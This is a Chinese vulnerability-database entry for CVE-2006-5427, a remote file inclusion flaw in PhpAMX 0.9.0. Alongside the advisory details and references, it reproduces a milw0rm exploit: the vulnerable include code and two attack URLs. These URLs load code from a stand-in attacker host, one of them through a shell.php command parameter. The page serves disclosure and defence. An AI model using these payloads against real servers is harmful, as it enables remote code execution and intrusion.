PHPAMX 'Main.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111326 漏洞类型 输入验证
发布时间 2006-10-18 更新时间 2006-10-23
CVE编号 CVE-2006-5427 CNNVD-ID CNNVD-200610-338
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2591
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-338
|漏洞详情
PhpAMX0.9.0版本的plugins/main.php中存在PHP远程文件包含漏洞,在启用register_globals或magic_quotes_gpc的情况下,远程攻击者可以通过plug_path参数中的URL来执行任意PHP代码。
|漏洞EXP
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
#                                                               #
#           [ phpamx 0.90 ]                                     #
#                                                                
# Class:     Remote|Local File Include Vulnerability            #
# Patch:     Unavailable                                        #
# Published  2006/10/18                                         #
# Remote:    Yes                                                
# Local:     No       						#
# Type:      High                                               #
# Site:      http://sourceforge.net/projects/phpamx/            #
# Author:    MP
# Contact:   mp01010@yahoo.com     				#
#        							#
#################################################################

Vuln Code
 (php/plugins/main.php):
<?php
include($plug_path."!playtime_top15.php");
include($plug_path."!mapcycle_list.php");
//nothing here
?>

#Vuln 1.0 -> require register_globals = On
http://victim.com/phpamx-0.9.0/php/plugins/main.php?plug_path=http://attacker.com/


#Vuln 2.0 -> require magic_quotes_gpc = Off
http://victim.com/phpamx-0.9.0/php/plugins/main.php?plug_path=http://attacker.com/shell.php?cmd=pwd%00

# milw0rm.com [2006-10-18]
|参考资料

来源:XF
名称:phpamx-main-file-include(29649)
链接:http://xforce.iss.net/xforce/xfdb/29649
来源:BID
名称:20601
链接:http://www.securityfocus.com/bid/20601
来源:MILW0RM
名称:2591
链接:http://www.milw0rm.com/exploits/2591
来源:VUPEN
名称:ADV-2006-4088
链接:http://www.frsirt.com/english/advisories/2006/4088
来源:SECUNIA
名称:22455
链接:http://secunia.com/advisories/22455
来源:MILW0RM
名称:2591
链接:http://milw0rm.com/exploits/2591